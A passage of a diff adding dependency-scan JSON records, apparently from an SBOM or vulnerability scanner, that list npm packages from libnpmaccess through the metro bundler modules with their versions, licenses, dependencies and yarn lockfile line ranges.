"Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7024, + "EndLine": 7027 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmaccess@10.0.3", + "Name": "libnpmaccess", + "Identifier": { + "PURL": "pkg:npm/libnpmaccess@10.0.3", + "UID": "3bb30b162615194c" + }, + "Version": "10.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-package-arg@13.0.1", + "npm-registry-fetch@19.0.0" + ], + "Locations": [ + { + "StartLine": 7037, + "EndLine": 7043 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmdiff@8.0.9", + "Name": "libnpmdiff", + "Identifier": { + "PURL": "pkg:npm/libnpmdiff@8.0.9", + "UID": "32edba30261924dd" + }, + "Version": "8.0.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/arborist@9.1.6", + "@npmcli/installed-package-contents@3.0.0", + "binary-extensions@3.1.0", + "diff@8.0.2", + "minimatch@10.0.3", + "npm-package-arg@13.0.1", + "pacote@21.0.3", + "tar@7.5.1" + ], + "Locations": [ + { + "StartLine": 7045, + "EndLine": 7055 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmexec@10.1.8", + "Name": "libnpmexec", + "Identifier": { + "PURL": "pkg:npm/libnpmexec@10.1.8", + "UID": "b43fe360a8ca39c3" + }, + "Version": "10.1.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/arborist@9.1.6", + "@npmcli/package-json@7.0.1", + "@npmcli/run-script@10.0.0", + "ci-info@4.3.1", + "npm-package-arg@13.0.1", + "pacote@21.0.3", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "read@4.1.0", + "semver@7.7.3", + "signal-exit@4.1.0", + "walk-up-path@4.0.0" + ], + "Locations": [ + { + "StartLine": 7057, + "EndLine": 7071 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmfund@7.0.9", + "Name": "libnpmfund", + "Identifier": { + "PURL": "pkg:npm/libnpmfund@7.0.9", + "UID": "a4a3c68ee60321ea" + }, + "Version": "7.0.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/arborist@9.1.6" + ], + "Locations": [ + { + "StartLine": 7073, + "EndLine": 7076 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmorg@8.0.1", + "Name": "libnpmorg", + "Identifier": { + "PURL": "pkg:npm/libnpmorg@8.0.1", + "UID": "e6ee5acd03b37822" + }, + "Version": "8.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "aproba@2.1.0", + "npm-registry-fetch@19.0.0" + ], + "Locations": [ + { + "StartLine": 7078, + "EndLine": 7084 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmpack@9.0.9", + "Name": "libnpmpack", + "Identifier": { + "PURL": "pkg:npm/libnpmpack@9.0.9", + "UID": "13783388efa02f68" + }, + "Version": "9.0.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/arborist@9.1.6", + "@npmcli/run-script@10.0.0", + "npm-package-arg@13.0.1", + "pacote@21.0.3" + ], + "Locations": [ + { + "StartLine": 7086, + "EndLine": 7092 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmpublish@11.1.2", + "Name": "libnpmpublish", + "Identifier": { + "PURL": "pkg:npm/libnpmpublish@11.1.2", + "UID": "45920cecab5f3f1f" + }, + "Version": "11.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/package-json@7.0.1", + "ci-info@4.3.1", + "npm-package-arg@13.0.1", + "npm-registry-fetch@19.0.0", + "proc-log@5.0.0", + "semver@7.7.3", + "sigstore@4.0.0", + "ssri@12.0.0" + ], + "Locations": [ + { + "StartLine": 7094, + "EndLine": 7104 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmsearch@9.0.1", + "Name": "libnpmsearch", + "Identifier": { + "PURL": "pkg:npm/libnpmsearch@9.0.1", + "UID": "c0a01e834f55c09a" + }, + "Version": "9.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-registry-fetch@19.0.0" + ], + "Locations": [ + { + "StartLine": 7106, + "EndLine": 7111 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmteam@8.0.2", + "Name": "libnpmteam", + "Identifier": { + "PURL": "pkg:npm/libnpmteam@8.0.2", + "UID": "7ec370c907d4711c" + }, + "Version": "8.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "aproba@2.1.0", + "npm-registry-fetch@19.0.0" + ], + "Locations": [ + { + "StartLine": 7113, + "EndLine": 7119 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "libnpmversion@8.0.2", + "Name": "libnpmversion", + "Identifier": { + "PURL": "pkg:npm/libnpmversion@8.0.2", + "UID": "d1219dc735f3b387" + }, + "Version": "8.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/git@7.0.0", + "@npmcli/run-script@10.0.0", + "json-parse-even-better-errors@4.0.0", + "proc-log@5.0.0", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 7121, + "EndLine": 7128 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lighthouse-logger@1.4.2", + "Name": "lighthouse-logger", + "Identifier": { + "PURL": "pkg:npm/lighthouse-logger@1.4.2", + "UID": "4174455ac831cde7" + }, + "Version": "1.4.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "marky@1.3.0" + ], + "Locations": [ + { + "StartLine": 7130, + "EndLine": 7136 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lines-and-columns@1.2.4", + "Name": "lines-and-columns", + "Identifier": { + "PURL": "pkg:npm/lines-and-columns@1.2.4", + "UID": "7bdaa9bd50321fde" + }, + "Version": "1.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7138, + "EndLine": 7141 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "linkify-it@2.2.0", + "Name": "linkify-it", + "Identifier": { + "PURL": "pkg:npm/linkify-it@2.2.0", + "UID": "d445e6f4ab172037" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "uc.micro@1.0.6" + ], + "Locations": [ + { + "StartLine": 7143, + "EndLine": 7148 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "locate-path@3.0.0", + "Name": "locate-path", + "Identifier": { + "PURL": "pkg:npm/locate-path@3.0.0", + "UID": "60ac7d7b0cc47eed" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-locate@3.0.0", + "path-exists@3.0.0" + ], + "Locations": [ + { + "StartLine": 7150, + "EndLine": 7156 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "locate-path@5.0.0", + "Name": "locate-path", + "Identifier": { + "PURL": "pkg:npm/locate-path@5.0.0", + "UID": "13104bfc7e2a8f59" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-locate@4.1.0" + ], + "Locations": [ + { + "StartLine": 7158, + "EndLine": 7163 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "locate-path@6.0.0", + "Name": "locate-path", + "Identifier": { + "PURL": "pkg:npm/locate-path@6.0.0", + "UID": "a735df47226cb635" + }, + "Version": "6.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-locate@5.0.0" + ], + "Locations": [ + { + "StartLine": 7165, + "EndLine": 7170 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lodash@4.17.21", + "Name": "lodash", + "Identifier": { + "PURL": "pkg:npm/lodash@4.17.21", + "UID": "186d85640a76e982" + }, + "Version": "4.17.21", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7202, + "EndLine": 7205 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lodash.camelcase@4.3.0", + "Name": "lodash.camelcase", + "Identifier": { + "PURL": "pkg:npm/lodash.camelcase@4.3.0", + "UID": "44330bd5170009dc" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7172, + "EndLine": 7175 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lodash.map@4.6.0", + "Name": "lodash.map", + "Identifier": { + "PURL": "pkg:npm/lodash.map@4.6.0", + "UID": "99e6665772b849c7" + }, + "Version": "4.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7182, + "EndLine": 7185 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lodash.throttle@4.1.1", + "Name": "lodash.throttle", + "Identifier": { + "PURL": "pkg:npm/lodash.throttle@4.1.1", + "UID": "de06db325ae1f74f" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7192, + "EndLine": 7195 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lodash.zipobject@4.1.3", + "Name": "lodash.zipobject", + "Identifier": { + "PURL": "pkg:npm/lodash.zipobject@4.1.3", + "UID": "947db9809932eb43" + }, + "Version": "4.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7197, + "EndLine": 7200 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "log-symbols@4.1.0", + "Name": "log-symbols", + "Identifier": { + "PURL": "pkg:npm/log-symbols@4.1.0", + "UID": "147553e5acf74491" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "chalk@4.1.2", + "is-unicode-supported@0.1.0" + ], + "Locations": [ + { + "StartLine": 7207, + "EndLine": 7213 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "long@5.3.2", + "Name": "long", + "Identifier": { + "PURL": "pkg:npm/long@5.3.2", + "UID": "9893025480d9ec97" + }, + "Version": "5.3.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7224, + "EndLine": 7227 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "loose-envify@1.4.0", + "Name": "loose-envify", + "Identifier": { + "PURL": "pkg:npm/loose-envify@1.4.0", + "UID": "339973e510f603ab" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "js-tokens@4.0.0" + ], + "Locations": [ + { + "StartLine": 7229, + "EndLine": 7234 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lower-case@2.0.2", + "Name": "lower-case", + "Identifier": { + "PURL": "pkg:npm/lower-case@2.0.2", + "UID": "e92d668f1416c52b" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 7236, + "EndLine": 7241 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lru-cache@10.4.3", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@10.4.3", + "UID": "e4fdfa683a527b04" + }, + "Version": "10.4.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7243, + "EndLine": 7246 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lru-cache@11.2.2", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@11.2.2", + "UID": "4a73867d5706e347" + }, + "Version": "11.2.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7248, + "EndLine": 7249 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lru-cache@5.1.1", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@5.1.1", + "UID": "3731bc55c5d02f51" + }, + "Version": "5.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yallist@3.1.1" + ], + "Locations": [ + { + "StartLine": 7251, + "EndLine": 7256 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "lru-cache@6.0.0", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@6.0.0", + "UID": "a91bc11967da8249" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 7258, + "EndLine": 7263 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "make-fetch-happen@14.0.3", + "Name": "make-fetch-happen", + "Identifier": { + "PURL": "pkg:npm/make-fetch-happen@14.0.3", + "UID": "74637a6016978c2a" + }, + "Version": "14.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/agent@3.0.0", + "cacache@19.0.1", + "http-cache-semantics@4.2.0", + "minipass@7.1.2", + "minipass-fetch@4.0.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "negotiator@1.0.0", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "ssri@12.0.0" + ], + "Locations": [ + { + "StartLine": 7272, + "EndLine": 7285 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "make-fetch-happen@15.0.2", + "Name": "make-fetch-happen", + "Identifier": { + "PURL": "pkg:npm/make-fetch-happen@15.0.2", + "UID": "fcc902341701fbb0" + }, + "Version": "15.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/agent@4.0.0", + "cacache@20.0.1", + "http-cache-semantics@4.2.0", + "minipass@7.1.2", + "minipass-fetch@4.0.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "negotiator@1.0.0", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "ssri@12.0.0" + ], + "Locations": [ + { + "StartLine": 7287, + "EndLine": 7300 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "makeerror@1.0.12", + "Name": "makeerror", + "Identifier": { + "PURL": "pkg:npm/makeerror@1.0.12", + "UID": "137e23292d3d7e81" + }, + "Version": "1.0.12", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tmpl@1.0.5" + ], + "Locations": [ + { + "StartLine": 7324, + "EndLine": 7329 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "map-obj@1.0.1", + "Name": "map-obj", + "Identifier": { + "PURL": "pkg:npm/map-obj@1.0.1", + "UID": "73d00ff167b4c8f5" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7331, + "EndLine": 7334 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "map-obj@4.3.0", + "Name": "map-obj", + "Identifier": { + "PURL": "pkg:npm/map-obj@4.3.0", + "UID": "65f5207dd4717898" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7336, + "EndLine": 7339 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "markdown-it@10.0.0", + "Name": "markdown-it", + "Identifier": { + "PURL": "pkg:npm/markdown-it@10.0.0", + "UID": "4c261f3cdcfba96d" + }, + "Version": "10.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "argparse@1.0.10", + "entities@2.0.3", + "linkify-it@2.2.0", + "mdurl@1.0.1", + "uc.micro@1.0.6" + ], + "Locations": [ + { + "StartLine": 7341, + "EndLine": 7350 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "marky@1.3.0", + "Name": "marky", + "Identifier": { + "PURL": "pkg:npm/marky@1.3.0", + "UID": "5c9bccd27e446b2e" + }, + "Version": "1.3.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7352, + "EndLine": 7355 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "math-intrinsics@1.1.0", + "Name": "math-intrinsics", + "Identifier": { + "PURL": "pkg:npm/math-intrinsics@1.1.0", + "UID": "ae43f5cf03921cfd" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7357, + "EndLine": 7360 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mdn-data@2.0.14", + "Name": "mdn-data", + "Identifier": { + "PURL": "pkg:npm/mdn-data@2.0.14", + "UID": "a59a133e487fb1cc" + }, + "Version": "2.0.14", + "Licenses": [ + "CC0-1.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7362, + "EndLine": 7365 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mdn-data@2.0.28", + "Name": "mdn-data", + "Identifier": { + "PURL": "pkg:npm/mdn-data@2.0.28", + "UID": "b5ba312422eb1d8" + }, + "Version": "2.0.28", + "Licenses": [ + "CC0-1.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7367, + "EndLine": 7370 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mdn-data@2.0.30", + "Name": "mdn-data", + "Identifier": { + "PURL": "pkg:npm/mdn-data@2.0.30", + "UID": "9c5c06183b5a266a" + }, + "Version": "2.0.30", + "Licenses": [ + "CC0-1.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7372, + "EndLine": 7375 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mdurl@1.0.1", + "Name": "mdurl", + "Identifier": { + "PURL": "pkg:npm/mdurl@1.0.1", + "UID": "e705d5a8f3423c3a" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7377, + "EndLine": 7380 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "memoize-one@5.2.1", + "Name": "memoize-one", + "Identifier": { + "PURL": "pkg:npm/memoize-one@5.2.1", + "UID": "599d906e9ae7da58" + }, + "Version": "5.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7387, + "EndLine": 7390 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "meow@9.0.0", + "Name": "meow", + "Identifier": { + "PURL": "pkg:npm/meow@9.0.0", + "UID": "14747cfb8b2f0ac2" + }, + "Version": "9.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/minimist@1.2.5", + "camelcase-keys@6.2.2", + "decamelize@1.2.0", + "decamelize-keys@1.1.1", + "hard-rejection@2.1.0", + "minimist-options@4.1.0", + "normalize-package-data@3.0.3", + "read-pkg-up@7.0.1", + "redent@3.0.0", + "trim-newlines@3.0.1", + "type-fest@0.18.1", + "yargs-parser@20.2.9" + ], + "Locations": [ + { + "StartLine": 7392, + "EndLine": 7408 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "merge-options@3.0.4", + "Name": "merge-options", + "Identifier": { + "PURL": "pkg:npm/merge-options@3.0.4", + "UID": "2d1cf795d992d4e8" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-plain-obj@2.1.0" + ], + "Locations": [ + { + "StartLine": 7410, + "EndLine": 7415 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "merge-stream@2.0.0", + "Name": "merge-stream", + "Identifier": { + "PURL": "pkg:npm/merge-stream@2.0.0", + "UID": "385a628233c76d5a" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7417, + "EndLine": 7420 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "merge2@1.4.1", + "Name": "merge2", + "Identifier": { + "PURL": "pkg:npm/merge2@1.4.1", + "UID": "b2eee79c0a007427" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7422, + "EndLine": 7425 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro@0.83.3", + "Name": "metro", + "Identifier": { + "PURL": "pkg:npm/metro@0.83.3", + "UID": "6895e7cb0899a622" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@babel/core@7.28.4", + "@babel/generator@7.28.3", + "@babel/parser@7.28.4", + "@babel/template@7.27.2", + "@babel/traverse@7.28.4", + "@babel/types@7.28.4", + "accepts@1.3.8", + "chalk@4.1.2", + "ci-info@2.0.0", + "connect@3.7.0", + "debug@4.4.3", + "error-stack-parser@2.1.4", + "flow-enums-runtime@0.0.6", + "graceful-fs@4.2.11", + "hermes-parser@0.32.0", + "image-size@1.2.1", + "invariant@2.2.4", + "jest-worker@29.7.0", + "jsc-safe-url@0.2.4", + "lodash.throttle@4.1.1", + "metro-babel-transformer@0.83.3", + "metro-cache@0.83.3", + "metro-cache-key@0.83.3", + "metro-config@0.83.3", + "metro-core@0.83.3", + "metro-file-map@0.83.3", + "metro-resolver@0.83.3", + "metro-runtime@0.83.3", + "metro-source-map@0.83.3", + "metro-symbolicate@0.83.3", + "metro-transform-plugins@0.83.3", + "metro-transform-worker@0.83.3", + "mime-types@2.1.35", + "nullthrows@1.1.1", + "serialize-error@2.1.0", + "source-map@0.5.7", + "throat@5.0.0", + "ws@7.5.10", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 7574, + "EndLine": 7618 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-babel-transformer@0.83.3", + "Name": "metro-babel-transformer", + "Identifier": { + "PURL": "pkg:npm/metro-babel-transformer@0.83.3", + "UID": "8b62b2cde3a1543d" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "flow-enums-runtime@0.0.6", + "hermes-parser@0.32.0", + "nullthrows@1.1.1" + ], + "Locations": [ + { + "StartLine": 7427, + "EndLine": 7435 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-cache@0.83.3", + "Name": "metro-cache", + "Identifier": { + "PURL": "pkg:npm/metro-cache@0.83.3", + "UID": "4fd615f72d97e163" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "exponential-backoff@3.1.2", + "flow-enums-runtime@0.0.6", + "https-proxy-agent@7.0.6", + "metro-core@0.83.3" + ], + "Locations": [ + { + "StartLine": 7444, + "EndLine": 7452 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-cache-key@0.83.3", + "Name": "metro-cache-key", + "Identifier": { + "PURL": "pkg:npm/metro-cache-key@0.83.3", + "UID": "3895e127c41494dc" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6" + ], + "Locations": [ + { + "StartLine": 7437, + "EndLine": 7442 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-config@0.83.3", + "Name": "metro-config", + "Identifier": { + "PURL": "pkg:npm/metro-config@0.83.3", + "UID": "3655210f3a2848a4" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "connect@3.7.0", + "flow-enums-runtime@0.0.6", + "jest-validate@29.7.0", + "metro@0.83.3", + "metro-cache@0.83.3", + "metro-core@0.83.3", + "metro-runtime@0.83.3", + "yaml@2.8.1" + ], + "Locations": [ + { + "StartLine": 7454, + "EndLine": 7466 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-core@0.83.3", + "Name": "metro-core", + "Identifier": { + "PURL": "pkg:npm/metro-core@0.83.3", + "UID": "9452004724b9a1e2" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6", + "lodash.throttle@4.1.1", + "metro-resolver@0.83.3" + ], + "Locations": [ + { + "StartLine": 7468, + "EndLine": 7475 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-file-map@0.83.3", + "Name": "metro-file-map", + "Identifier": { + "PURL": "pkg:npm/metro-file-map@0.83.3", + "UID": "ad58ef8981471bf" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@4.4.3", + "fb-watchman@2.0.2", + "flow-enums-runtime@0.0.6", + "graceful-fs@4.2.11", + "invariant@2.2.4", + "jest-worker@29.7.0", + "micromatch@4.0.8", + "nullthrows@1.1.1", + "walker@1.0.8" + ], + "Locations": [ + { + "StartLine": 7477, + "EndLine": 7490 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-minify-terser@0.83.3", + "Name": "metro-minify-terser", + "Identifier": { + "PURL": "pkg:npm/metro-minify-terser@0.83.3", + "UID": "c8f2c547c8794747" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6", + "terser@5.44.0" + ], + "Locations": [ + { + "StartLine": 7492, + "EndLine": 7498 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-resolver@0.83.3", + "Name": "metro-resolver", + "Identifier": { + "PURL": "pkg:npm/metro-resolver@0.83.3", + "UID": "7afde93a4af8c50" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6" + ], + "Locations": [ + { + "StartLine": 7500, + "EndLine": 7505 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-runtime@0.83.3", + "Name": "metro-runtime", + "Identifier": { + "PURL": "pkg:npm/metro-runtime@0.83.3", + "UID": "f2766d21c278a8f8" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.28.4", + "flow-enums-runtime@0.0.6" + ], + "Locations": [ + { + "StartLine": 7507, + "EndLine": 7513 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-source-map@0.83.3", + "Name": "metro-source-map", + "Identifier": { + "PURL": "pkg:npm/metro-source-map@0.83.3", + "UID": "541fec97ee217bc3" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse@7.28.4", + "@babel/traverse--for-generate-function-map@7.28.4", + "@babel/types@7.28.4", + "flow-enums-runtime@0.0.6", + "invariant@2.2.4", + "metro-symbolicate@0.83.3", + "nullthrows@1.1.1", + "ob1@0.83.3", + "source-map@0.5.7", + "vlq@1.0.1" + ], + "Locations": [ + { + "StartLine": 7515, + "EndLine": 7529 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-symbolicate@0.83.3", + "Name": "metro-symbolicate", + "Identifier": { + "PURL": "pkg:npm/metro-symbolicate@0.83.3", + "UID": "14680860defe8ef6" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6", + "invariant@2.2.4", + "metro-source-map@0.83.3", + "nullthrows@1.1.1", + "source-map@0.5.7", + "vlq@1.0.1" + ], + "Locations": [ + { + "StartLine": 7531, + "EndLine": 7541 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-transform-plugins@0.83.3", + "Name": "metro-transform-plugins", + "Identifier": { + "PURL": "pkg:npm/metro-transform-plugins@0.83.3", + "UID": "62f3c2ac5aac5552" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/generator@7.28.3", + "@babel/template@7.27.2", + "@babel/traverse@7.28.4", + "flow-enums-runtime@0.0.6", + "nullthrows@1.1.1" + ], + "Locations": [ + { + "StartLine": 7543, + "EndLine": 7553 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "metro-transform-worker@0.83.3", + "Name": "metro-transform-worker", + "Identifier": { + "PURL": "pkg:npm/metro-transform-worker@0.83.3", + 